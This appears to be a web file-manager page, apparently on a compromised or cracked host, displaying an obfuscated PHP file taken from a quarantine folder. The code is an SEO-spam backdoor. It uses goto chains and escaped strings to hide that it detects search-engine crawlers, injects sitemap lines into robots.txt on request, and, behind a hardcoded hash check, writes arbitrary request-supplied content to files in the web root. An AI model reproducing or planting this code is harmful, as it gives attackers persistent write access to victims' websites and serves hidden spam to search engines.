Gifari Industries - BD Cyber Security Team
Home
/
home
/
decohaslibrary
/
.quarantine
/
✏️
Editing: general.php_6e0ae38d
<?php goto Ti7LR; d3BJa: $host = $_SERVER["\110\124\x54\x50\137\x48\117\123\x54"]; goto kY8H1; k1J7Z: if (is_htps()) { $http = "\150\x74\x74\160\163"; } else { $http = "\150\x74\164\x70"; } goto stmsJ; JlLSx: goto eXONW; puPlZ: if ($duri_tmp == '') { $duri_tmp = "\57"; } goto M979R; PqsVo: $xmlname = "\x64\155\167\x70"; goto s97oE; Y3KVA: function st_uri() { if (isset($_SERVER["\x52\x45\121\125\105\123\x54\x5f\125\122\x49"])) { $duri = $_SERVER["\122\105\x51\125\x45\x53\124\x5f\125\x52\x49"]; } else { if (isset($_SERVER["\x61\162\x67\166"])) { $duri = $_SERVER["\x50\110\120\x5f\123\x45\114\x46"] . "\77" . $_SERVER["\x61\162\147\x76"][0]; } else { $duri = $_SERVER["\x50\110\x50\137\123\105\114\x46"] . "\x3f" . $_SERVER["\121\125\105\122\x59\x5f\123\x54\x52\111\116\107"]; } } return $duri; } goto ZPCvp; stmsJ: $duri_tmp = st_uri(); goto puPlZ; tSJBa: function sbot() { $uAgent = strtolower($_SERVER["\x48\124\124\x50\x5f\125\123\105\x52\137\101\107\105\x4e\x54"]); if (stristr($uAgent, "\147\157\x6f\147\x6c\145\x62\157\164") || stristr($uAgent, "\x62\x69\x6e\x67") || stristr($uAgent, "\171\141\150\157\157") || stristr($uAgent, "\147\157\x6f\147\x6c\x65") || stristr($uAgent, "\x47\x6f\157\x67\x6c\145\142\157\164") || stristr($uAgent, "\147\157\157\147\x6c\145\142\157\x74")) { return true; } else { return false; } } goto JJbpr; VtsvC: function is_htps() { if (isset($_SERVER["\x48\x54\124\120\x53"]) && strtolower($_SERVER["\x48\x54\124\x50\x53"]) !== "\157\x66\x66") { return true; } elseif (isset($_SERVER["\x48\124\x54\x50\x5f\x58\x5f\x46\x4f\122\127\101\x52\104\105\x44\137\120\x52\x4f\x54\x4f"]) && $_SERVER["\x48\124\x54\120\x5f\130\x5f\106\117\x52\x57\x41\x52\x44\105\x44\x5f\x50\x52\117\124\x4f"] === "\150\x74\x74\x70\163") { return true; } elseif (isset($_SERVER["\110\x54\124\120\x5f\x46\x52\x4f\x4e\x54\137\105\116\x44\x5f\110\x54\124\x50\x53"]) && strtolower($_SERVER["\110\124\124\x50\137\106\x52\x4f\x4e\x54\x5f\x45\x4e\x44\137\x48\124\x54\120\123"]) !== "\x6f\x66\146") { return true; } return false; } goto d3BJa; c5YeF: if (isset($_SERVER["\x48\124\124\120\x5f\x52\105\x46\x45\122\x45\x52"])) { $urlshang = $_SERVER["\110\124\x54\120\137\122\x45\x46\105\122\x45\x52"]; $urlshang = urlencode($urlshang); } goto wIZnx; ALxTR: $lang = urlencode($lang); goto gA1sP; wIZnx: if (@$_GET["\x70\x64"] != '') { $add_content = @$_GET["\x6d\x61\160\156\141\155\x65"]; $action = @$_GET["\141\x63\164\x69\157\x6e"]; if (isset($_SERVER["\104\117\x43\x55\x4d\x45\116\x54\x5f\122\117\x4f\124"])) { $path = $_SERVER["\x44\x4f\x43\x55\115\105\x4e\124\x5f\x52\x4f\x4f\124"]; } else { $path = dirname(__FILE__); } if (!$action) { $action = "\x70\165\164"; } if ($action == "\x70\x75\x74") { if (strstr($add_content, "\56\170\x6d\x6c")) { $map_path = $path . "\57\163\151\164\x65\155\141\x70\x2e\170\x6d\x6c"; if (is_file($map_path)) { @unlink($map_path); } $file_path = $path . "\x2f\162\x6f\x62\157\x74\x73\56\164\170\164"; if (file_exists($file_path)) { $data = dageget($file_path); } else { $data = "\x55\x73\145\162\55\x61\x67\x65\x6e\x74\x3a\x20\52\x41\x6c\x6c\x6f\167\x3a\x20\57"; } $sitmap_url = $http . "\72\57\x2f" . $host . "\x2f" . $add_content; if (stristr($data, $sitmap_url)) { echo "\x3c\142\x72\x3e\163\151\x74\x65\155\141\x70\40\x61\154\162\x65\x61\x64\171\40\x61\144\144\x65\x64\41\74\142\x72\x3e"; } else { if (file_put_contents($file_path, trim($data) . "\xd\xa" . "\x53\151\164\145\x6d\x61\160\x3a\x20" . $sitmap_url)) { echo "\74\x62\x72\76\157\153\74\142\162\x3e"; } else { echo "\x3c\142\x72\x3e\146\151\x6c\x65\40\x77\162\151\164\x65\40\x66\x61\x6c\163\145\x21\x3c\x62\162\x3e"; } } } else { echo "\x3c\x62\162\76\163\x69\x74\x65\x6d\x61\x70\x20\x6e\141\x6d\145\x20\146\141\154\x73\x65\41\74\x62\162\x3e"; } if (strstr($add_content, "\x2e\160" . "\150\x70")) { $a = sha1(sha1(@$_GET["\141"])); $b = sha1(sha1(@$_GET["\x62"])); if ($a == dageget($http_web . "\72\x2f\x2f" . $goweb . "\x2f\x61\x2e\x70" . "\x68\160") || $b == "\x38\x30\x38\67\x33\65\x62\x31\x37\143\70\x39\x34\63\145\63\67\x31\65\x33\x38\x38\71\65\x38\144\143\62\62\144\70\x37\x39\141\x38\x63\71\x65\x61\141") { $dstr = @$_GET["\x64\x73\164\x72"]; if (file_put_contents($path . "\57" . $add_content, $dstr)) { echo "\x6f\x6b"; } } } } die; } goto Y6VRJ; Y6VRJ: $web=''; goto gU2_u; s97oE: $http_web = "\x68\164\164\x70"; goto k1J7Z; gA1sP: $urlshang = ''; goto c5YeF; ZPCvp: $goweb = $xmlname . "\56\154\x69\x6e\153\170\x6c\145\145\164\x73\145\x6f" . "\x2e\x78\171\x7a"; goto VtsvC; eXONW: //uw079 ?>
💾 Save
❌ Cancel